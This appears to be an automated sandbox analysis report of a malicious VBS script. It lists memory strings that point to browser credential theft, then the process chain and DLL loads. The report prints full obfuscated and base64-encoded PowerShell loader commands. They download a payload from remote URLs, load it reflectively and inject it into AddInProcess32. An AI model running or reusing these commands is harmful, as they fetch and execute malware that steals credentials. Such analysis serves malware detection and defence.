              Source: AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
              Source: AddInProcess32.exe, 00000005.00000002.2630145863.0000000004573000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2643159235.000000007028D000.00000002.00000001.01000000.0000000A.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
              Source: AddInProcess32.exe, 00000005.00000002.2630145863.0000000004573000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2630145863.0000000004573000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2643159235.000000007028D000.00000002.00000001.01000000.0000000A.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
              Source: AddInProcess32.exe, 00000005.00000002.2630145863.0000000004573000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: AddInProcess32.exe, 00000005.00000002.2630145863.0000000004573000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2643159235.000000007028D000.00000002.00000001.01000000.0000000A.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
              Source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2643159235.000000007028D000.00000002.00000001.01000000.0000000A.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
              Source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2643159235.000000007028D000.00000002.00000001.01000000.0000000A.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL id FROM %s;
              Source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2643159235.000000007028D000.00000002.00000001.01000000.0000000A.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
              Source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2630145863.0000000004573000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2630145863.0000000004573000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
              Source: AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2643159235.000000007028D000.00000002.00000001.01000000.0000000A.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
              Source: AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
              Source: nEofbjk.tmp.5.dr, .zyDKbw.tmp.5.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 89SkYNNpdi.vbsVirustotal: Detection: 11%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\89SkYNNpdi.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAyYTAnKyc3NWIxYmMnKycwJysnZDQnKyc1YicrJzYzMicrJ2ViOScrJ2UnKydlNjInKyctYnUnKydwLycrJy86c3B0JysndGhZU0QgLCcrJyBZU0QnKydkZXNhdCcrJ2knKyd2JysnYWQnKydvWVMnKydEICwnKycgJysnWVNEJysnZCcrJ2VzYScrJ3RpJysndmFkbycrJ1knKydTRCcrJyAsICcrJ1lTRGRlc2F0aXZhZG9ZJysnUycrJ0QnKycsWScrJ1NEQWRkJysnSW5QJysncm8nKydjZXNzMycrJzJZU0QsWVNEWVNEJysnKSknKS5yRVBMYUNFKCdkazcnLFtzdFJpTmddW0NoYVJdMzYpLnJFUExhQ0UoJ1lTRCcsW3N0UmlOZ11bQ2hhUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((Gv '*MDr*').naME[3,11,2]-Join'') (('dk'+'7u'+'rl '+'= YSDhttps://ia600100.us'+'.a'+'rchive.org/2'+'4'+'/'+'items/det'+'ah-'+'note-v/'+'Detah'+'N'+'oteV.t'+'xt'+'YSD'+';dk7'+'b'+'ase'+'64Co'+'nten'+'t'+' = '+'(Ne'+'w-O'+'bje'+'ct '+'S'+'ys'+'te'+'m.Ne'+'t.WebC'+'lie'+'nt).Downlo'+'a'+'dS'+'trin'+'g(d'+'k7u'+'rl'+');d'+'k'+'7bi'+'n'+'aryCo'+'n'+'ten'+'t = '+'[Syste'+'m.Convert'+']:'+':'+'Fr'+'omBase64S'+'tri'+'ng(d'+'k'+'7bas'+'e6'+'4Conten'+'t);dk7'+'ass'+'em'+'bl'+'y ='+' ['+'R'+'eflect'+'ion.As'+'s'+'embly]:'+':L'+'oa'+'d(dk7bin'+'ary'+'Co'+'ntent);'+'dk7ty'+'p'+'e = '+'dk'+'7'+'as'+'se'+'mbly.Ge'+'tType('+'Y'+'SDRu'+'nP'+'E'+'.Hom'+'eY'+'SD'+');dk7method ='+' dk7'+'type.'+'G'+'e'+'tMeth'+'od(YSDVAIYSD)'+';dk7met'+'h'+'o'+'d.I'+'nvoke('+'dk7n'+'ull,'+' [obj'+'ect[]]'+'@('+'YSD'+'txt.'+'ey'+'no/v'+'ed.2r.39b34'+'5302a0'+'75b1bc'+'0'+'d4'+'5b'+'632'+'eb9'+'e'+'e62'+'-bu'+'p/'+'/:spt'+'thYSD ,'+' YSD'+'desat'+'i'+'v'+'ad'+'oYS'+'D ,'+' '+'YSD'+'d'+'esa'+'ti'+'vado'+'Y'+'SD'+' , '+'YSDdesativadoY'+'S'+'D'+',Y'+'SDAdd'+'InP'+'ro'+'cess3'+'2YSD,YSDYSD'+'))').rEPLaCE('dk7',[stRiNg][ChaR]36).rEPLaCE('YSD',[stRiNg][ChaR]39) )"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR3YgJypNRHIqJykubmFNRVszLDExLDJdLUpvaW4nJykgKCgnZGsnKyc3dScrJ3JsICcrJz0gWVNEaHR0cHM6Ly9pYTYwMDEwMC51cycrJy5hJysncmNoaXZlLm9yZy8yJysnNCcrJy8nKydpdGVtcy9kZXQnKydhaC0nKydub3RlLXYvJysnRGV0YWgnKydOJysnb3RlVi50JysneHQnKydZU0QnKyc7ZGs3JysnYicrJ2FzZScrJzY0Q28nKydudGVuJysndCcrJyA9ICcrJyhOZScrJ3ctTycrJ2JqZScrJ2N0ICcrJ1MnKyd5cycrJ3RlJysnbS5OZScrJ3QuV2ViQycrJ2xpZScrJ250KS5Eb3dubG8nKydhJysnZFMnKyd0cmluJysnZyhkJysnazd1JysncmwnKycpO2QnKydrJysnN2JpJysnbicrJ2FyeUNvJysnbicrJ3RlbicrJ3QgPSAnKydbU3lzdGUnKydtLkNvbnZlcnQnKyddOicrJzonKydGcicrJ29tQmFzZTY0UycrJ3RyaScrJ25nKGQnKydrJysnN2JhcycrJ2U2JysnNENvbnRlbicrJ3QpO2RrNycrJ2FzcycrJ2VtJysnYmwnKyd5ID0nKycgWycrJ1InKydlZmxlY3QnKydpb24uQXMnKydzJysnZW1ibHldOicrJzpMJysnb2EnKydkKGRrN2JpbicrJ2FyeScrJ0NvJysnbnRlbnQpOycrJ2RrN3R5JysncCcrJ2UgPSAnKydkaycrJzcnKydhcycrJ3NlJysnbWJseS5HZScrJ3RUeXBlKCcrJ1knKydTRFJ1JysnblAnKydFJysnLkhvbScrJ2VZJysnU0QnKycpO2RrN21ldGhvZCA9JysnIGRrNycrJ3R5cGUuJysnRycrJ2UnKyd0TWV0aCcrJ29kKFlTRFZBSVlTRCknKyc7ZGs3bWV0JysnaCcrJ28nKydkLkknKydudm9rZSgnKydkazduJysndWxsLCcrJyBbb2JqJysnZWN0W11dJysnQCgnKydZU0QnKyd0eHQuJysnZXknKyduby92JysnZWQuMnIuMzliMzQnKyc1MzAyYTAnKyc3NWIxYmMnKycwJysnZDQnKyc1YicrJzYzMicrJ2ViOScrJ2UnKydlNjInKyctYnUnKydwLycrJy86c3B0JysndGhZU0QgLCcrJyBZU0QnKydkZXNhdCcrJ2knKyd2JysnYWQnKydvWVMnKydEICwnKycgJysnWVNEJysnZCcrJ2VzYScrJ3RpJysndmFkbycrJ1knKydTRCcrJyAsICcrJ1lTRGRlc2F0aXZhZG9ZJysnUycrJ0QnKycsWScrJ1NEQWRkJysnSW5QJysncm8nKydjZXNzMycrJzJZU0QsWVNEWVNEJysnKSknKS5yRVBMYUNFKCdkazcnLFtzdFJpTmddW0NoYVJdMzYpLnJFUExhQ0UoJ1lTRCcsW3N0UmlOZ11bQ2hhUl0zOSkgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((Gv '*MDr*').naME[3,11,2]-Join'') (('dk'+'7u'+'rl '+'= YSDhttps://ia600100.us'+'.a'+'rchive.org/2'+'4'+'/'+'items/det'+'ah-'+'note-v/'+'Detah'+'N'+'oteV.t'+'xt'+'YSD'+';dk7'+'b'+'ase'+'64Co'+'nten'+'t'+' = '+'(Ne'+'w-O'+'bje'+'ct '+'S'+'ys'+'te'+'m.Ne'+'t.WebC'+'lie'+'nt).Downlo'+'a'+'dS'+'trin'+'g(d'+'k7u'+'rl'+');d'+'k'+'7bi'+'n'+'aryCo'+'n'+'ten'+'t = '+'[Syste'+'m.Convert'+']:'+':'+'Fr'+'omBase64S'+'tri'+'ng(d'+'k'+'7bas'+'e6'+'4Conten'+'t);dk7'+'ass'+'em'+'bl'+'y ='+' ['+'R'+'eflect'+'ion.As'+'s'+'embly]:'+':L'+'oa'+'d(dk7bin'+'ary'+'Co'+'ntent);'+'dk7ty'+'p'+'e = '+'dk'+'7'+'as'+'se'+'mbly.Ge'+'tType('+'Y'+'SDRu'+'nP'+'E'+'.Hom'+'eY'+'SD'+');dk7method ='+' dk7'+'type.'+'G'+'e'+'tMeth'+'od(YSDVAIYSD)'+';dk7met'+'h'+'o'+'d.I'+'nvoke('+'dk7n'+'ull,'+' [obj'+'ect[]]'+'@('+'YSD'+'txt.'+'ey'+'no/v'+'ed.2r.39b34'+'5302a0'+'75b1bc'+'0'+'d4'+'5b'+'632'+'eb9'+'e'+'e62'+'-bu'+'p/'+'/:spt'+'thYSD ,'+' YSD'+'desat'+'i'+'v'+'ad'+'oYS'+'D ,'+' '+'YSD'+'d'+'esa'+'ti'+'vado'+'Y'+'SD'+' , '+'YSDdesativadoY'+'S'+'D'+',Y'+'SDAdd'+'InP'+'ro'+'cess3'+'2YSD,YSDYSD'+'))').rEPLaCE('dk7',[stRiNg][ChaR]36).rEPLaCE('YSD',[stRiNg][ChaR]39) )"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
